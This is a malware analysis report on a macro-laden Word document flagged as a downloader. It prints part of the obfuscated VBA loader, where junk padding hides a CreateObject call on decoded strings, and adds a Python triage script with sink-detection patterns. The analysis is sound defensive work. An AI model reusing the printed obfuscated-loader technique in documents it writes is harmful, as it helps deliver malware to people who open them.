Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 49ce522ee8d6aac5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 186.3 KB
Created: 2019-10-21 13:37:00
Authoring application: Microsoft Office Word
First seen: 2020-09-04
MD5: 9315ac7bb0fe11fc03a239ff8fd5059c
SHA-1: 5bc51f211db6b6fb4cafd75567edfead8569b620
SHA-256: 49ce522ee8d6aac5d7db702d398e0b6bdd01fab467a79a8c0723cfa3bafa73b8
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1140 Deobfuscate/Decode Files or Information

The sample is a Word document whose VBA project is padded with inert statements: builtin calls whose result is discarded (Month, Weekday, CSng, CDbl, ...) on decoy user-agent strings, postal addresses and IP literals, write-only assignments, and Rem/' comments, all under On Error Resume Next so that the junk can never fault. The only live sink visible in the extracted source is CreateObject applied to the output of a string decoder (Yhomdrmomdsr, called twice on the function's argument), so the COM ProgID, and any download URL or command line the decoded string carries, never appears as a literal in the macro. That is also why the only URL extracted from the file is the OOXML DrawingML namespace from the document body, not from the macro. Together with the AutoOpen entry point and the ClamAV Doc.Downloader.Generic signature this is consistent with a downloader-style loader; the decoder body and its output are not in the truncated preview, so the second stage is inferred from heuristics rather than observed.

Heuristics (8)

  • ClamAV: Doc.Downloader.Generic-7349828-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7349828-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the marker is redundant: a VBA project was in fact recovered (macros.bas under Extracted artifacts), so the AutoOpen surface is already covered by OLE_VBA_AUTOOPEN.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the OOXML DrawingML namespace URI that Office itself writes into drawing markup; it is not a download location and should not be added to IOC lists.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  28282 bytes
SHA-256: fa5e48124b6cd52a8349fe1768d2cc9f3c4e58bff9089c39d75d21e7ec8a108a

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Gbfcjayufyba"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Dkwvpknwpztwl, 0, 0, MSForms, CommandButton"
Attribute VB_Control = "Upwpeaxzola, 1, 1, MSForms, CommandButton"
Attribute VB_Control = "Zllxarwbzd, 2, 2, MSForms, CommandButton"
Attribute VB_Control = "Holozulny, 3, 3, MSForms, CommandButton"
Attribute VB_Control = "Rmqrtrpoqudvs, 4, 4, MSForms, CommandButton"
Attribute VB_Control = "Chwksruyjdpn, 5, 5, MSForms, CommandButton"
Attribute VB_Control = "Vpwjbqxzw, 6, 6, MSForms, CommandButton"
Attribute VB_Control = "Fkxnipevcrodk, 7, 7, MSForms, CommandButton"
Attribute VB_Control = "Cniugpiu, 8, 8, MSForms, CommandButton"
Attribute VB_Control = "Lftabjcu, 9, 9, MSForms, CommandButton"
Attribute VB_Control = "Dxwznznhwwbjw, 10, 10, MSForms, CommandButton"
Attribute VB_Control = "Kuryheocve, 11, 11, MSForms, CommandButton"
Attribute VB_Control = "Wknowncmfyt, 12, 12, MSForms, CommandButton"
Attribute VB_Control = "Rvsnhenedj, 13, 13, MSForms, CommandButton"
Attribute VB_Control = "Fbrrsmkjum, 14, 14, MSForms, CommandButton"

Attribute VB_Name = "Ogqtqedw"
Function Varvara(VarvaraA)
On Error Resume Next
   Rem 207.79.245.2
Month CSng("Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/534.2.2 (KHTML, like Gecko) Chrome/24.0.831.0 Safari/534.2.2")
Mjtfebifz = Fix(Fikuhhuxdlv)
Yzkohsohvj = 669
Weekday Vnfvvbvzdj
Atvfzhxrp = CDbl("Customer08641 Jaylin Branch, Vadaburgh, Suriname")
Eruygfjkz = CStr("Bike")
Ltpcikzuf = Tan("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7.3; rv:9.1) Gecko/20100101 Firefox/9.1.6")
Gnoxiinmzwlg = Rnd("Robel - CarterApt. 681South")
Rem Stehr, Prosacco and HilpertApt. 389West
DateValue 229
Bdptuzhk = Sqr(Bqwzmrvdt)
Minute Atn("Cheese")
Day Sin("Mouse")
Minute Round(Gjiwawnulz)
Yggkblolvvg = 546
Lozibimptutg = "Schuppe, Hodkiewicz and BrekkeSuite 657Northwest"
Weekday Dupgiobysght
Month 934
Aplcneoio = "Shoes"
'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/537.0.2 (KHTML, like Gecko) Chrome/37.0.885.0 Safari/537.0.2
Rbzfmndfrl = Log(290)
Set Varvara = CreateObject(Yhomdrmomdsr(Yhomdrmomdsr(VarvaraA)))
   Rem 65.210.88.214
Day CDbl("Legacy1469 Raphael Mews, Lolamouth, Belgium")
Trsdwsbocxg = Sgn(Lxiyvnimfegrk)
Jibkvraxb = 210
Day Eszlinfo
Ujoendoml = Round("McClure - MrazApt. 048Northeast")
Wtftvwkgkz = CBool("Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.2.2 (KHTML, like Gecko) Chrome/28.0.850.0 Safari/533.2.2")
Sjpmtvslwua = CStr("91.128.251.155")
Mginllpzriytr = Log("Williamson IncSuite 259Northwest")
Rem 182.89.122.26
Hour 979
Vhrhnvwvxqvr = CDate(Pctrujqbsyorn)
Weekday Hex("Hat")
DateValue Atn("Direct02872 Preston Turnpike, New Amariview, Burkina Faso")
Minute Round(Qsbibqoc)
Dqllxqtw = 888
Gfcxdbtp = "Regional64379 Kozey Plains, Uptonport, Lao People's Democratic Republic"
DateValue Vivugxtiribz
Day 448
Qtfqviuvnyt = "Cheese"
'Tuna
Efaxyjzgvuq = Sqr(197)
End Function
Function Dpugiauw()
On Error Resume Next
   Rem 68.247.182.83
Month Rnd("National2965 Hoeger Crossing, South Jennyfer, French Southern Territories")
Sadvbzaddacpy = Fix(Amjxcgzl)
Xcvnraaq = 661
Hour Dzqkhruwohjaq
Ezpnqsoh = CDbl("Heidenreich LLCApt. 467Southeast")
Weplabzx = Log("16.251.46.82")
Bwypkldwoqxmj = CByte("92.68.109.104")
Blckforvgk = CStr("District560 Bergnaum Place, West Krista, Romania")
Rem Corporate41240 Conor Glens, Kayceeport, Nepal
Year 769
Kofkdqmbi = CInt(Deprtdgkvfzzq)
Weekday CDbl("Bednar, Satterfield and WelchApt. 214Southeast")
Second CStr("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.3; Trident/7.0)")
Day CLng(Ulkbsfxhsi)
Tvwjealzf = 322
Xraarzlpporwb = "Corporate199 Toy Underpass, East Leo, Qatar"
WeekdayName Hufxwjlxn
WeekdayName 761
Vuyfwgdonjsff = "Bike"
'Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; rv:11.0) like Gecko
Tsscyusws = CByte(506)
... (truncated)
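The following Python pass is an added example, not the report's or the analysis platform's own rule code. It applies the loader-shape logic described under OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC to decoded VBA source like the preview above: it strips the inert padding (comments, discarded builtin calls, write-only assignments), lists auto-exec entry points and execution/COM sinks, and reports which non-builtin functions sit between a sink and its argument, i.e. the decoder candidates to pull out of the full macros.bas next. The BUILTINS table, the sink list and the SAMPLE excerpt are assumptions constructed for this example; SAMPLE abridges the Varvara function from the preview, and its AutoOpen stub is constructed, since the preview only shows the padded Varvara and Dpugiauw functions and the report merely states that an AutoOpen macro exists.

```python
"""Static triage of an obfuscated auto-exec VBA loader (added example)."""
import re

# VBA builtins the padding abuses: a bare statement calling one of these
# discards its result and cannot affect control flow. (Assumed list.)
BUILTINS = {
    "month", "weekday", "weekdayname", "day", "hour", "minute", "second",
    "year", "datevalue", "csng", "cdbl", "cstr", "cbool", "cbyte", "cint",
    "clng", "cdate", "fix", "sqr", "tan", "sin", "atn", "rnd", "log",
    "round", "sgn", "hex", "abs", "int", "cos", "exp",
}
AUTOEXEC = {"autoopen", "autoexec", "autoclose", "auto_open", "auto_close",
            "document_open", "document_close", "workbook_open"}
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)",
                     re.I | re.M)
SINK_RE = re.compile(
    r"(CreateObject|GetObject|Shell|CallByName|\.Run|\.Exec|\.ShellExecute)\s*\(",
    re.I)
STRING_RE = re.compile(r'"[^"]*"')
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed, abridged excerpt of the macros.bas preview. Yhomdrmomdsr lies
# outside the truncated preview and is not reproduced; the AutoOpen stub is
# constructed (the report only states that an AutoOpen macro exists).
SAMPLE = r'''
Attribute VB_Name = "Ogqtqedw"
Function Varvara(VarvaraA)
On Error Resume Next
   Rem 207.79.245.2
Month CSng("Mozilla/5.0 (Windows; U; Windows NT 6.3) AppleWebKit/534.2.2 Chrome/24.0.831.0")
Mjtfebifz = Fix(Fikuhhuxdlv)
Yzkohsohvj = 669
Weekday Vnfvvbvzdj
Atvfzhxrp = CDbl("Customer08641 Jaylin Branch, Vadaburgh, Suriname")
'Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/537.0.2 Chrome/37.0.885.0
Set Varvara = CreateObject(Yhomdrmomdsr(Yhomdrmomdsr(VarvaraA)))
Sjpmtvslwua = CStr("91.128.251.155")
End Function
Sub AutoOpen()
On Error Resume Next
Dpugiauw
End Sub
'''


def _is_comment(s):
    return s.startswith("'") or s.lower() == "rem" or s.lower().startswith("rem ")


def _ident_counts(src):
    """Occurrences of each identifier in code, string literals excluded."""
    counts = {}
    for line in src.splitlines():
        s = line.strip()
        if _is_comment(s):
            continue
        for name in re.findall(r"\b[A-Za-z_]\w*\b", STRING_RE.sub('""', s)):
            counts[name.lower()] = counts.get(name.lower(), 0) + 1
    return counts


def is_inert(line, counts):
    """Blank lines, comments, Attribute metadata, bare builtin calls whose
    result is discarded, and assignments to names never read elsewhere."""
    s = line.strip()
    if not s or _is_comment(s) or s.lower().startswith("attribute "):
        return True
    m = re.match(r"^(\w+)\s+\S", s)            # e.g. Month CSng("...")
    if m and m.group(1).lower() in BUILTINS:
        return True
    m = re.match(r"^(\w+)\s*=", s)             # e.g. Yzkohsohvj = 669
    return bool(m) and counts.get(m.group(1).lower(), 0) == 1


def strip_junk(src):
    """The statements that can still influence execution, in order."""
    counts = _ident_counts(src)
    return [l.strip() for l in src.splitlines() if not is_inert(l, counts)]


def autoexec_entry_points(src):
    return sorted(m.group(1) for m in PROC_RE.finditer(src)
                  if m.group(1).lower() in AUTOEXEC)


def _balanced_arg(text, start):
    """Text inside the parenthesis that opens at text[start]."""
    depth = 0
    for i in range(start, len(text)):
        if text[i] == "(":
            depth += 1
        elif text[i] == ")":
            depth -= 1
            if depth == 0:
                return text[start + 1:i]
    return text[start + 1:]


def find_sinks(src):
    """Execution/COM sinks with their argument and the non-builtin callees
    feeding it; a non-literal argument is the obfuscated-loader shape."""
    defined = {m.group(1).lower() for m in PROC_RE.finditer(src)}
    sinks = []
    for line in src.splitlines():
        s = line.strip()
        if _is_comment(s):
            continue
        for m in SINK_RE.finditer(s):
            arg = _balanced_arg(s, m.end() - 1).strip()
            callees = re.findall(r"\b([A-Za-z_]\w*)\s*\(", arg)
            sinks.append({
                "sink": m.group(1), "argument": arg,
                "literal": STRING_RE.fullmatch(arg) is not None,
                "decoders": sorted({c for c in callees if c.lower() not in BUILTINS}),
                "decoder_in_module": any(c.lower() in defined for c in callees),
            })
    return sinks


def decoy_ips(src):
    """IPv4 literals that occur only inside padding; they are not IOCs."""
    counts = _ident_counts(src)
    live = "\n".join(strip_junk(src))
    found = set()
    for line in src.splitlines():
        if is_inert(line, counts):
            found.update(ip for ip in IPV4_RE.findall(line)
                         if all(int(o) <= 255 for o in ip.split(".")))
    return sorted(ip for ip in found if ip not in live)


def triage(src):
    entry = autoexec_entry_points(src)
    sinks = find_sinks(src)
    return {
        "entry_points": entry,
        "sinks": sinks,
        "obfuscated_loader": bool(entry) and any(not s["literal"] for s in sinks),
        "live_statements": len(strip_junk(src)),
        "total_statements": sum(1 for l in src.splitlines() if l.strip()),
        "literal_urls": URL_RE.findall(src),
        "decoy_ips": decoy_ips(src),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
    print("\n".join(strip_junk(SAMPLE)))
```

Running triage(SAMPLE) reduces Varvara to its single live statement, names Yhomdrmomdsr as the function to extract and emulate next, reports no literal URL in the macro (consistent with the EMBEDDED_URL finding, whose only hit came from the document body), and separates the IP literals that exist only inside padding from anything worth putting in an IOC list. The same pass runs unchanged over the full 28282-byte macros.bas.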